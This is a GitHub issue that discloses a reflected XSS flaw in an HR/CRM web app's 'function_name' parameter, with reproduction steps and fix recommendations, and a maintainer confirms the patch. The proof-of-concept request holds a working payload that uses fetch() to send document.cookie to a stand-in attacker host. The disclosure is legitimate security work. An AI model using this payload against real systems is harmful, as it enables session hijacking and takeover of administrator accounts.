Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cross-site Scripting (XSS) Vulnerability #67

Closed
Sn1r opened this issue May 17, 2024 · 1 comment
Closed

Cross-site Scripting (XSS) Vulnerability #67

Sn1r opened this issue May 17, 2024 · 1 comment

Comments

@Sn1r
Copy link

Sn1r commented May 17, 2024

Description

A registered user in the system can execute arbitrary JavaScript code and thus, achieve a reflected Cross-site Scripting (XSS) attack. This can result, for example, in stealing targeted users' session cookies (including admins) or redirecting them to download arbitrary files controlled by the attacker.

Steps to Reproduce

  1. Log in to the system as a regular user.
  2. Familiarize yourself with the HTTP requests and notice the error message returned from the "ESListViewController" action when an incorrect function name is inserted via the "function_name" parameter.
  3. Notice that when inserting HTML code into the "function_name" parameter value, several tags and events are escaped by the server, preventing the injection of arbitrary client-side code.
  4. Observe that when inserting specific tags, such as or
    , in conjunction with double less-than signs (<<) at the end, the HTML code is rendered successfully.
  5. Notice that some events, such as "onbeforeinput," are rendered as well, allowing the construction of a successful XSS payload using arbitrary client-side code. This crafted payload is responsible for stealing the targeted user's session cookie upon accessing the URL and pressing any key.
  6. The targeted user, who has the role of administrator, accesses the crafted URL, presses any key, and the session cookie is transferred to an attacker-controlled website automatically, without the admin's knowledge.
  7. The attacker gains complete access to the administrator account and performs further actions on the system, such as creating a new administrator account for persistent access and extracting sensitive information about the company.

Disclaimer

Although the exploitation requires user interaction, attackers can easily manipulate this. The severe consequences (such as session hijacking) occur without the victim's knowledge, making this attack vector highly viable. For example, an attacker can create a convincing form that tricks the victim into entering arbitrary characters. Since the URL appears legitimate and only a single character/action is needed for a successful attack, it is highly likely to succeed.

Proof of Concept Request and Response

Request:

GET /legacy/index.php?action=ESList&function_name=<div+id="xss"+contenteditable+onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='%2bdocument['cookie']);"+autofocus>"<"< HTTP/1.1
Host: 192.168.146.150
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Origin: http://192.168.146.150
Referer: http://192.168.146.150/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Users_divs=undefined%3D%23Users_aclroles_v%3Dtrue%23; Employees_divs=Employees_trainings_v%3Dfalse%23undefined%3D%23; ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; ck_login_language_20=en_us; sugar_user_theme=SuiteP; PHPSESSID={{session}
Connection: close

Response:

HTTP/1.1 200 OK
Date: Fri, 17 May 2024 10:16:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: ck_login_language_20=en_us; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: sugar_user_theme=SuiteP; expires=Sat, 17-May-2025 10:16:35 GMT; Max-Age=31536000; path=/; domain=192.168.146.150; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Content-Encoding-Over-Network: gzip
Content-Length: 203

Class does not have function: ESListViewController-><div id="xss" contenteditable onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='+document['cookie']);" autofocus>"&lt;"&lt;
Screenshot_7
PoC-alert.mp4
PoC-stealing-cookies.mp4

Impact

Gain complete access to the system with an administrator account or any other user of the attacker's choice.

Recommendations

  1. Ensure that user-generated content undergoes HTML encoding before display, which neutralizes any potentially harmful scripts.
  2. Use the HttpOnly attribute for cookies, which prevents client-side scripts from accessing them, thereby preventing XSS attacks targeting session data theft or manipulation.
  3. Implement Content Security Policies (CSPs), which define approved sources for content loading, limiting the execution of malicious scripts injected by attackers.

References

https://cwe.mitre.org/data/definitions/79.html
https://portswigger.net/web-security/cross-site-scripting
@MintHCM-admin
Copy link
Collaborator

MintHCM-admin commented May 20, 2024
edited

Thank you very much for your report! We fixed it in version 4.0.3.1, which is available now. Let us know if you run into any more problems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@MintHCM-admin @Sn1r